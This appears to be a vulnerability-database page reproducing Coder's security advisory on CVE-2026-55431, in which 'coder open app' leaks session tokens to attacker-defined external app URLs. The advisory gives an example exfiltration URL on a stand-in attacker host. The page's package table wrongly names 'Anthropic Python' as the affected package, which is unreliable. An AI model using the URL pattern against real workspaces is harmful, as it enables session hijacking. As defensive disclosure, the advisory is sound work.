### Summary `coder open app` opens external workspace-app URLs without validating the scheme or host. When an external app URL contains the `$SESSION_TOKEN` placeholder the CLI replaces it with the user's real session token before handing the URL to the OS open handler. > **Note:** Practical...
Full CISO analysis pending enrichment.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Anthropic Python | go | >= 2.34.0, < 2.34.2 | 2.34.2 |
Do you use Anthropic Python? You're affected.
How severe is it?
What is the attack surface?
What should I do?
Patch available
Update Anthropic Python to version 2.34.2
Which compliance frameworks are affected?
Compliance analysis pending. Sign in for full compliance mapping when available.
Frequently Asked Questions
What is CVE-2026-55431?
### Summary `coder open app` opens external workspace-app URLs without validating the scheme or host. When an external app URL contains the `$SESSION_TOKEN` placeholder the CLI replaces it with the user's real session token before handing the URL to the OS open handler. > **Note:** Practical exploitation requires the victim to run `coder open app` against a workspace whose external app definition the attacker controls. Only a malicious template author can control external app URLs. ### Impact Workspace code can register external apps with arbitrary URLs so an attacker who controls workspace contents can define a URL like `https://attacker.example/?t=$SESSION_TOKEN`. Running `coder open app` then sends the user's session token to the attacker and enables full account impersonation for the token's lifetime. The same path can invoke arbitrary local URI scheme handlers. Exploitation requires the user to run `coder open app` against a workspace that contains a malicious external app. ### Patches The fix applies a URL-scheme allowlist in the CLI and limits `$SESSION_TOKEN` substitution to trusted destinations like the web frontend. The fix was backported to all supported release lines: | Release line | Patched version | |---|---| | 2.34 | [v2.34.2](https://github.com/coder/coder/releases/tag/v2.34.2) | | 2.33 | [v2.33.8](https://github.com/coder/coder/releases/tag/v2.33.8) | | 2.32 | [v2.32.7](https://github.com/coder/coder/releases/tag/v2.32.7) | | 2.29 (ESR) | [v2.29.17](https://github.com/coder/coder/releases/tag/v2.29.17) | ### Workarounds Avoid running `coder open app` for untrusted workspaces. ### Resources - Fix: #26146 ### Credits Coder would like to thank Anthropic's Security Team (ANT-2026-22457) for independently disclosing this issue!
Is CVE-2026-55431 actively exploited?
No confirmed active exploitation of CVE-2026-55431 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-55431?
Update to patched version: Anthropic Python 2.34.2.
What is the CVSS score for CVE-2026-55431?
CVE-2026-55431 has a CVSS v3.1 base score of 7.7 (HIGH).
What are the technical details?
Original Advisory
### Summary `coder open app` opens external workspace-app URLs without validating the scheme or host. When an external app URL contains the `$SESSION_TOKEN` placeholder the CLI replaces it with the user's real session token before handing the URL to the OS open handler. > **Note:** Practical exploitation requires the victim to run `coder open app` against a workspace whose external app definition the attacker controls. Only a malicious template author can control external app URLs. ### Impact Workspace code can register external apps with arbitrary URLs so an attacker who controls workspace contents can define a URL like `https://attacker.example/?t=$SESSION_TOKEN`. Running `coder open app` then sends the user's session token to the attacker and enables full account impersonation for the token's lifetime. The same path can invoke arbitrary local URI scheme handlers. Exploitation requires the user to run `coder open app` against a workspace that contains a malicious external app. ### Patches The fix applies a URL-scheme allowlist in the CLI and limits `$SESSION_TOKEN` substitution to trusted destinations like the web frontend. The fix was backported to all supported release lines: | Release line | Patched version | |---|---| | 2.34 | [v2.34.2](https://github.com/coder/coder/releases/tag/v2.34.2) | | 2.33 | [v2.33.8](https://github.com/coder/coder/releases/tag/v2.33.8) | | 2.32 | [v2.32.7](https://github.com/coder/coder/releases/tag/v2.32.7) | | 2.29 (ESR) | [v2.29.17](https://github.com/coder/coder/releases/tag/v2.29.17) | ### Workarounds Avoid running `coder open app` for untrusted workspaces. ### Resources - Fix: #26146 ### Credits Coder would like to thank Anthropic's Security Team (ANT-2026-22457) for independently disclosing this issue!
Weaknesses (CWE)
CWE-522 Insufficiently Protected Credentials
Primary
CWE-601 URL Redirection to Untrusted Site ('Open Redirect')
Primary
CWE-522 — Insufficiently Protected Credentials: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.
- [Architecture and Design] Use an appropriate security mechanism to protect the credentials.
- [Architecture and Design] Make appropriate use of cryptography to protect the credentials.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N References
Timeline
Related Vulnerabilities
CVE-2026-55429 8.7 Analysis pending
Same package: anthropic CVE-2026-7574 8.7 Claude Desktop: VM integrity bypass enables RCE
Same package: anthropic CVE-2026-55427 8.3 Analysis pending
Same package: anthropic CVE-2026-55428 8.2 Analysis pending
Same package: anthropic CVE-2026-45370 7.7 utcp-cli: env leak exfiltrates all agent process secrets
Same package: anthropic